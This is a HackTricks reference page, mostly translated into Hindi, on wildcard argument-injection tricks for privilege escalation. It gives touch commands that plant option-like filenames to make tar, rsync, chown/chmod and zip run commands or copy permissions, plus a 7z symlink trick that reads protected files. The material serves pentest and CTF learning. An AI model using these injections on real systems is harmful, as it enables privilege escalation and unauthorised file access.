Wildcards Spare tricks

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

chown, chmod

आप यह संकेत दे सकते हैं कि आप बाकी फाइलों के लिए कौन सा फ़ाइल मालिक और अनुमतियाँ कॉपी करना चाहते हैं

touch "--reference=/my/own/path/filename"

आप इसे https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (संयुक्त हमला) का उपयोग करके शोषण कर सकते हैं। अधिक जानकारी के लिए https://www.exploit-db.com/papers/33930 पर जाएं।

Tar

मनमाने आदेश निष्पादित करें:

touch "--checkpoint=1"
touch "--checkpoint-action=exec=sh shell.sh"

आप इसे https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (tar हमला) का उपयोग करके शोषण कर सकते हैं। अधिक जानकारी के लिए https://www.exploit-db.com/papers/33930 पर जाएं।

Rsync

मनमाने आदेश निष्पादित करें:

Interesting rsync option from manual:

-e, --rsh=COMMAND           specify the remote shell to use
--rsync-path=PROGRAM    specify the rsync to run on remote machine
touch "-e sh shell.sh"

आप इसे https://github.com/localh0t/wildpwn/blob/master/wildpwn.py _(_rsync attack) का उपयोग करके शोषण कर सकते हैं। अधिक जानकारी के लिए https://www.exploit-db.com/papers/33930 पर जाएं।

7z

7z में -- का उपयोग करने पर भी * से पहले (ध्यान दें कि -- का अर्थ है कि इसके बाद का इनपुट पैरामीटर के रूप में नहीं लिया जा सकता, इसलिए इस मामले में केवल फ़ाइल पथ) आप एक मनमाना त्रुटि उत्पन्न कर सकते हैं जिससे एक फ़ाइल पढ़ी जा सके, इसलिए यदि निम्नलिखित में से कोई आदेश रूट द्वारा निष्पादित किया जा रहा है:

7za a /backup/$filename.zip -t7z -snl -p$pass -- *

और आप उस फ़ोल्डर में फ़ाइलें बना सकते हैं जहाँ यह निष्पादित किया जा रहा है, आप फ़ाइल @root.txt बना सकते हैं और फ़ाइल root.txt को उस फ़ाइल के लिए symlink बना सकते हैं जिसे आप पढ़ना चाहते हैं:

cd /path/to/7z/acting/folder
touch @root.txt
ln -s /file/you/want/to/read root.txt

फिर, जब 7z निष्पादित होता है, यह root.txt को उन फ़ाइलों की सूची के रूप में मानता है जिन्हें इसे संकुचित करना चाहिए (यही @root.txt के अस्तित्व का संकेत है) और जब 7z root.txt पढ़ता है, तो यह /file/you/want/to/read को पढ़ेगा और चूंकि इस फ़ाइल की सामग्री फ़ाइलों की सूची नहीं है, यह एक त्रुटि फेंकेगा जो सामग्री दिखा रहा है।

हैकदबॉक्स से CTF के बॉक्स के लेखों में अधिक जानकारी।

ज़िप

मनमाने आदेश निष्पादित करें:

zip name.zip files -T --unzip-command "sh -c whoami"

AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE) GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE)

HackTricks का समर्थन करें

Last updated